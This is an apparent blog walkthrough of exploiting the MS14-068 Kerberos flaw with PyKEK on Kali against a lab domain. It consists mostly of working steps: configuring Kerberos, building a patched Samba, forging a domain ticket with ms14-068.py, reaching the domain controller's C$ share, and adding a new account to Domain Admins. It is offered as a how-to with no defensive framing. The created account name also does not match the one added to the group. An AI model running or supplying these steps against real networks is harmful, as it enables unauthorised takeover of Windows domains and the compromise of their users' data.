Exploiting MS14-068 with PyKEK and Kali

Here’s a quick writeup of exploiting MS14-068 using PyKEK and Kali.

Kali Prepwork

Install and Configure Kerberos

Install kerberos:

apt-get install krb5-user krb5-config

Create relevant kerberos config changes in /etc/krb5.conf:

[libdefaults]
  default_realm = pwn3d.local
[realms]
  pwn3d.local = {
    kdc = dc1.pwn3d.local
    admin_server = dc1.pwn3d.local
    default_domain = pwn3d.local
}

Point DNS to the DNS Server/domain controller so SRV records (e.g. _kerberos._tcp.*) will resolve correctly in /etc/resolv.conf.

According to the TrustedSec blog, you’ll need to sync time with the domain controller. During my testing I didn’t perform any syncing and had no issues.

Download, Compile and Install Samba

The Kali Samba package is missing many of the Samba tools, including several that are very useful for exploiting MS14-068. The build steps below are based on mubix’s blog post Dumping NTDS.dit Domain Hashes Using Samba.

Download Samba 4.1.0 and the replication only patch.

wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz

wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt

Extract the tarball.

tar zxvf samba-4.1.0.tar.gz mkdir src mv samba-4.1.0 src/

Add the replication only patch.

patch -p0 < samba-4.1.0_replication-only-patch.txt

Build and install Samba.

cd src/samba-4.1.0/
./configure
make -j 2 && make install

Exploitation

Determine the user SID:

rpcclient $> lookupnames john.smith
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)

Supply the SID and relevant config options to the python script and the magic happens.

# python ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
Password:
  [+] Building AS-REQ for 192.168.115.10... Done!
  [+] Sending AS-REQ to 192.168.115.10... Done!
  [+] Receiving AS-REP from 192.168.115.10... Done!
  [+] Parsing AS-REP from 192.168.115.10... Done!
  [+] Building TGS-REQ for 192.168.115.10... Done!
  [+] Sending TGS-REQ to 192.168.115.10... Done!
  [+] Receiving TGS-REP from 192.168.115.10... Done!
  [+] Parsing TGS-REP from 192.168.115.10... Done!
  [+] Creating ccache file 'TGT_john.smith@pwn3d.local.ccache'... Done!

Make the TGT your kerberos TGT.

# mv TGT_john.smith@pwn3d.local.ccache /tmp/krb5cc_$(echo $UID)

PWN!

If all went well, you can now use kerberos to authenticate.

# smbclient -k -W pwn3d -U john.smith //dc1.pwn3d.local/C$
OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1]
smb: \>

Create a new account and make it a member of the Domain Admins groups using the samba4 utilities/example code.

./user_add dc1.pwn3d.local kerberpwn3d2 Password1 -W pwn3d -U john.smith -k

./group_adduser dc1.pwn3d.local "Domain Admins" kerberpwn3d -W pwn3d -U john.smith -k

References

Tags: pykek, kali, samba, MS14-068